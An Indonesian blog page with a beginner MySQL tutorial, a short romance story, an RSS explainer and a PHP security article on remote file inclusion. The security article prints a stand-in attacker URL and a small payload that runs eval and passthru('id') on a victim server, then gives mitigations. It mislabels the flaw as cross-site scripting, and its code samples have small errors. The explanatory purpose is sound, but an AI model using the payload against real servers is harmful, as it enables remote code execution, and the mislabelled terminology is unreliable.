Minggu, 08 Juli 2012

PERINTAH DASAR MYSQL UNTUK PEMULA

0 komentar
Saya akan mencoba menjelaskan beberapa perintah-perintah dasar yang digunakan dalam pembuatan database di mysql. dimana tutorial ini akan saya jelaskan dengan sederhana agar dapat dengan mudah dipahami.

Membuat database baru Untuk membuat database baru, berikut langkah-langkahnya Buka jendela command prompt dengan cara pilih run lalu ketik cmd terus OK.

untuk membuat database baru
mysql>create database (nama database yang akan dibuat);
Contoh: create database pegawai;

melihat semua database yang telah dibuat atau database yang sudah ada
mysql>show databases;

menghapus database yang telah dibuat
mysql>drop database (nama database);
penjelasan : nama database adalah nama dari database yang akan kita hapus.
contoh :
misalkan kita telah membuat database dengan nama pegawai dan database tersebut kita akan
hapus karena mungkin ada kesalahan.
untuk menghapusnya :
mysql>drop database perpustakaan;

memilih database
mysql>use nama database
contoh : mysql>use perpustakaan;

membuat table baru
mysql>create tabel (nama tabel)
contoh : mysql>create table buku
(
kd_buku int(20)not null,
judul_buku varchar(50),
pengarang varchar(20),
penerbit varchar(30),
primary key(kd_buku)
);

mengisi atau memasukan data pada table
mysql>insert into (nama table)
contoh : mysql>insert into buku
values('bk0001','Belajar Mysql','Budi','PT. Coba-coba');

menampilkan seluruh isi tabel
mysql>select * from nama tabel
contoh : mysql>select * from buku;

Menghapus column
mysql> alter table nama tabel DROP nama column;
Contoh: mysql> alter table buku DROP judul_buku;

Mungkin ini adalah sebagian kecil dari tutorial mysql. masih banyak perintah-perintah mysql yang belum sempat dibahas dalam pembahasan kali ini. untuk perintah-perintah mysql selanjutnya akan dibahas dilain kesempatan.Apabila ada tulisan yang kurang di mengerti dari tutorial ini.

silahkan berikan comment kamu.Selamat mencoba dan Terimakasih.... Semoga bermanfaat..........

Jembatan

0 komentar

Mega  merah  05.60 saat basah tanah mengendap sesuatu yang tertunda. Ros namanya. Sawomatang dengan warna mata colklat yang bening.  Ada yang yang coba ia tahan antara kedua sumber sungai bening yang tidak pernah kering. Suara keras itu melukainya, keluar dari mulut laki-laki yang mungkin adalah mata air baginya. Meragu dengan semuanya bahwa keinginan adalah sebuah beban dari ketidaktahuan kita tentang masa depan kita. Tiba-tiba suara motor compreng yang bersuara fals menghaluskan perlahan khiayalanya, yono  nama pria itu tidak setampan artis india mungkin tapi, ia mempunyai karakter seorang  laki-laki yang dicari hampir seluruh populasi wanita di planet ini he,,he..he.
             Datang menggenggam tangan lembutnya, tangan yang pernah membelainya pada saat dia sakit, tangan yang selalu memberinya harapan saat semua orang mengacuhkanya. lalu apakah lagi yang harus kau cari bila keduanya ada pada diri satu wanita. Mendekapnya dari belakang membisikan beberapa kalimat berharap dengan itu dapat menenangkan hati sang dewi itu. Keduanyaa tahu bahwa hubungan yang mereka jalani saat ini terlalu rapuh untuk mereka perjuangkan  sementara mereka hanya mempunyai gigi dan kuku sebagai senjata mereka, iya agak sulit memang bila kita hidup dengan kedisiplinan yang tinggi yang kompromi  tidak diberi hak bersuara, sebuah ciri dari sebuah kekakuan militer yng mungkin adalah rahasia umum dinegara ini. 
               Jembatan itu seperti sebuah tugu perjanjian yang mereka tetapkan apakah hubungan itu pantas untuk mereka perjuangkan, cinta yang datang oleh sebab yang rahasianya tergantung antara sayap-sayap para malaikat dan bisikan para bidadari. Yono harus datang dan berbicara langsung dengan komandan sebuah bataliyon dikota itu, mengaku  bahwa ia siap bertanggung jawab dan siap menghadapi semuanya demi putrinya semata wayang yang didiknya dengan disiplin yang selalu ia banggakan pada setiap prajuritnya. Dengan keberanian yang tersisa  kesepakatan itu berujung bahwa yono akan berangkat kekampung halamanya untuk membritahukan kepada orang tuanya untuk melamar seorang putri tanah ayam jantan dari timur itu. besok harinya yono berangkat kekampungnya perlu dua hari perjalanan untuk sampai disana tanah yang ia tinggalkan demi satu cita yang digenggam kuat olenya, kini ia harus pulang dengan cita dan cinta yang harus ia berikan  sedikit cahaya  agar orang lain dapat melihatnya dengan jelas walau semampu mata menangkap bayangan.  Sementara Ros akan menunggu pangeranya  datang dengan mengendarai naga yang menyemburkan api cinta mereka berharap semua yang menghalanginya dapat terbakar  dan hangus.  Empat belas hari akhirnya waktu  akhirnya waktu itu datang juga, waktu yang hampir-hampir mencairkan jiwanya, waktu yang dimana penuh dengan doa dan harap berharap muhassabah dapat membuka pintu-pintu langit. Yono datang seorang diri dengan  keberanian yang memang ia harus punyai salah satu modal untuk menghadap sang komandan . pembicaraan yng berujung sebuah harga yang harus dibyar lunas dari sebuah konsekwensi logis  dari sebuah tanggung jawab cinta, harga yang harus dibayarkan tentang sebuah simbol kelaki-lakian yang wajib dijalani dalam sebuah keluarga. Lalu dengan sebuah asma syukur  pada sang pemilik cinta pernikahan itu akhirnya dapat dilaksanakan dengan kebahagiaan yang kelihatan dari bibir Ros yang bila  bulan memandangya pasti ia akan redup dengan malu.  Berharap kedepanya mereka dapat membangun sebuah kapal kecil mengarungi samudra ketidaktahuan kita tentang senang, sedih dan khayalan, tentang misteri  cinta yang kita selalu mencari jawaban tentangnya. 
              Sudah lima tahun berlalu seorang anak yang sedang tumbuh tengah bermain pekarangan kecil, berlari-lari dan tersenyum Nampak kecerdasan dimatanya yang terang dan menyala, menunggu setiap sore didepan pintu rumah kecil itu berharap ayahya pulng membawakan sebatang coklat atau sebuah permainan baru untuknya sembari pelukan hangat dari bahu dan dada bidang yang akan menjaganya sampai I dapat bertanggung jawab terhdap dirinya sendiri dan menemukan cintanya juga entah itu dari arah mana  sang maha akan menganugrahkanya. Gibran nama bocah itu sedikit nakal dan lincah namun ia adalah buah perjuangan itu, perjuangan cinta dari anak-anak waktu yang tidak semua diri dapat berani mempertaruhkanya.  Dimana harga diri dan kehormatan yang selalu coba kita banggakan ternyata tidak berartidihadapan cinta.

(Ditulis Oleh : Mirdad Arieflan )

Jumat, 22 Juni 2012

Keamanan Aplikasi Web dengan PHP Part. 2



Keamanan Aplikasi Web dengan PHP
PHP
Salam,,  Melanjutkan Artikel mengenai Keamanan aplikasi Web dengan PHP kemarin, dimana pada pembahasan kemarin kita membahas tentang variabel auto global. maka kali ini saya lanjutkan membahas masalah keamanan aplikasi web dengan php dengan penggunaan Fungsi include(), require() atau fopen().

  • Fungsi include(), require() atau fopen()


Akibat mekanisme autoglobal, suatu varibel dalam php menjadi tidak jelas jenisnya. Jenis variabel jadi tidak dapat dibedakan antara variabel dari GET/POST, varibel dari ENVIRONTMENT atau varibel dari COOKIES/SESSION. Akibatnya suatu variabel apa saja yang didefinisikan dapat dengan mudah diisi dengan nilai dari varibel GET atau POST.

Kelemahan biasanya muncul ketika digunakan varibel untuk parameter fungsi include(), require() atau fopen(). Dengan fungsi tersebut dapat dilakukan eksekusi/parsing file PHP dari file lain, baik pada file dari disk local atau file dari situs lain. Jika varibel untuk parameter fungsi tersebut diketahui,maka attacker dapat mengganti nilai varibel tersebut dengan mengirimkan nilai varibel lewat metode GET atau POST.

Contoh dibawah ini adalah vulnerability akibat menggunakan variabel pada fungsi include(). Perhatikan kode dibawah ini :
include($phpgw_info["server"]["include_root"]."/phpgwapi/phpgw_info.inc.php");

Kode tersebut tidak aman karena walaupun menggunakan varibel array, variable $phpgw_info masih dapat diganti dengan varibel GET/POST dari client atau diganti dengan sebuah url lain misalnya http://attacker/phpgwapi/phpgw_ info.inc.php, dimana file phpgw_info.inc.php dapat berisi kode php yang dapat dieksekusi oleh server korban/victim, misalnya berupa kode :

<?php $phpcode = 'echo("Hi there!<BR>");passthru("id");';
if (substr($HTTP_SERVER_VARS["HTTP_USER_AGENT"], 0, 3) == "PHP")
echo("<?php $phpcode ?>");
else
eval($phpcode);
exit();
?>

Kejadian seperti diatas, dimana suatu kode php dari situs lain diambil agar dieksekusi di server korban sering disebut Cross Site Scripting (XSS). Ada beberapa langkah untuk menghindari penggunaan variabel global saat mengakses file, yaitu :
▪ Hindari penggunaan variabel sebagai nama file. Variabel $lib_dir di atas bisa diganti dengan sebuah nilai yang didefinisikan oleh PHP yaitu fungsi define.

▪ Cek apakah nama file yang dibuat adalah salah satu dari nama file yang diinginkan, misalnya:

$valid_pages = array (
“apage.php” => “”,
“another.php” => “”,
“more.php” => “”);
if (!isset($valid_pages[$page])) {
// batalkan script
// sebaiknya buat pesan log di sini juga
die(“Invalid request”);
}

▪ jika ternyata harus menggunakan sebuah variabel dari browser, cek dahulu apakah nilai variabel menggunakan kode seperti di bawah ini:

if (!(eregi(“^[a-z_./]*$”, $page) && !eregi(\\.\\.,$page))) {
// batalkan script
// sebaiknya buat pesan log di sini juga
die(“Invalid request”);
}

▪ Jangan percaya variabel global untuk langkah berikutnya yang dapat menjamin variabel tidak akan digunakan untuk hal-hal yang merusak.

▪ Gunakan konfigurasi varibel allow_url_fopen dan open_basedir untuk membatasi lokasi di mana file bisa dibuka. 

Sekian dulu Artikel hari ini. sampai ketemu pada artikel berikutnya yang masih membahas masalah keamanan aplikasi web dengan php.

Terima Kasih Semoga Bermanfaat..

Jangan Lupa Komentarnya..... :D :)

Rabu, 13 Juni 2012

Pengertian RSS Feed dan Kegunaan

0 komentar

Pernahkah anda melihat sebuah website yang terdapat logo atau kata-kata RSS? Jawabannya adalah "Ya". Kebanyakan ketika kita membuka sebuah website atau mengunjungi blog, terdapat fasilitas RSS. Sebenarnya apa sih RSS itu? Dan apa kegunaannya?

RSS adalah sebuah file berformat XML yang digunakan untuk sebuah situs web atau blog (Sumber : http://id.wikipedia.org/wiki/RSS). Singkatan dari RSS ini mengacu kepada beberapa protokol, diantaranya :
  • Really Simple Syndication (RSS 2.0)
  • RDF Site Summary (RSS 0.9 dan 1.0)
  • Rich Text Summary (RSS 0.91)
Pengertian sederhana dan kegunaannya adalah teknologi yang memudahkan kita untuk mendapat informasi terbaru dari web atau blog tersebut, tanpa kita harus membuka website tersebut. Cukup dengan berlangganan RSS ini, maka anda informasi terbaru langsung bisa anda dapatkan.

Kemudian, apa itu Feed? Feed adalah pengumpul untuk mengecek situs yang menyediakan RSS dan menampilkan berbagai artikel baru yang ditemukan. Feed ini bisa berupa program komputer atau layanan yang berbasis online.

Untuk dapat menggunakan RSS ini tidak sulit. Karena anda tinggal klik RSS button yang berwarna orange. Setelah itu anda akan diberikan pilihan untuk memilih RSS Reader yang dapat memudahkan anda seperti Google atau My Yahoo!. Untuk berikutnya anda tinggal klik "Subscribe". Atau juga bisa berlangganan lewat email. Ini disediakan oleh beberapa situs web yang memberikan layanan agar informasi terbaru langsung masuk ke dalam email pribadi anda. Caranya pun tidak jauh beda. Disini anda hanya tinggal memasukkan email anda dengan benar dan klik Subscribe.

RSS Feed ini tidak hanya bisa di baca dari komputer saja. Tetapi bisa juga dari PDA, Hanphone, Smartphone, dll selama perangkat tersebut terdapat fasilitas aplikasi feed reader dan terkoneksi dengan internet.
Sumber : PT. Proweb Indonesia

Berikan Bintang

Followers

Free Page Rank Tool free search engine submission

FreeFind Site Search Engine - FreeFind adds a "search this site" feature to your website, making your site easier to use. FreeFind also gives you reports showing what your visitors are searching for, enabling you to improve your site. FreeFind's advanced site search engine and automatic site map technology can be added to your website for free.

http://www.freesearchenginesubmission.infometeo15jours.com

 

Copyright 2008 All Rights Reserved Revolution Two Church theme by Brian Gardner Converted into Blogger Template by Bloganol dot com